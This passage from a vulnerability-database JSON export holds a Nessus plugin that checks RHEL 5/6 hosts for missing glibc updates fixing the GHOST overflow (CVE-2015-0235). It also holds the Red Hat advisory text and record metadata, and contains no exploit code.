reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", 
cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", 
reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 12, "lastseen": "2019-01-16T20:20:46"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", 
"cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "609406179779e5ce50180d1319f9b120d86e033bb10e58ffada9b7a7439e2f2d", "hashmap": [{"hash": "5f51513fe342d0d876d5e6133b2e7d91", "key": "sourceData"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "7c03779312ffcb90b2c1d0c697a916c4", "key": "modified"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-07-30T14:05:51", "modified": "2018-07-26T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/26 18:45:29\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", 
reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", 
reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) 
flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", 